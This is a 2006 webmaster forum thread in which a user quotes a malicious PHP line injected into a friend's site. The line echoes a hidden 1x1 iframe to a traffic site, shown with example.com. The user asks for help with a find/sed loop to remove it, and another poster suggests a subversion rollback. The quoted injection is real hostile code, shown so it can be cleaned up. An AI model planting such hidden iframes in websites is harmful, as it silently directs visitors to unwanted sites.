Forum Moderators: bakedjake
<? echo ('<html><head><title></title></head><body><iframe src="http://www.example.com/traff/" width=1 height=1></iframe></body></html>');?>
Now I want to replace all the code with nothing.
for a in $(find -type f -not -regex '.*\/\.svn.*'); do sed -e 's/<\?\s echo\s \(\'<html><head><title><\/title><\/head\><body><iframe\s src=\"http:\/\/www\.example\.com\/traff\/\"\s width=1\s height=1><\/iframe><\/body><\/html>\'\);\?>//g' $a > $a.modifiedfile; mv -f $a.modifiedfile $a; done
since he is use subversion I can't edit inside .svn folders.
This is not working as I am not comfortable with regex and escape characters.
Please help urgently
Thanks,
AjiNIMC
[edited by: tedster at 7:00 pm (utc) on Jan. 3, 2006]
[edit reason] use example.com in code [/edit]
Please help.
[edited by: tedster at 2:48 am (utc) on Jan. 4, 2006]
Also, if he is using subversion, surely this manages all changes to the code, so it is easy to roll back to a version prior to the defacement? Or perhaps I have misunderstood the problem?
Thanks for the help, sorry for mentioning the redirecting site name as wanted to help those suffering from the same virus. I am going to blog it in full detail but do not want to post dup content over here.
Can I post the blog URL, it can be an inactive link but surely it will be a help to many. This virus is spreading fast as I saw few sites getting infected at the same time. If I am allowed then only I will post the blog URL.
Thanks again,
AjiNIMC
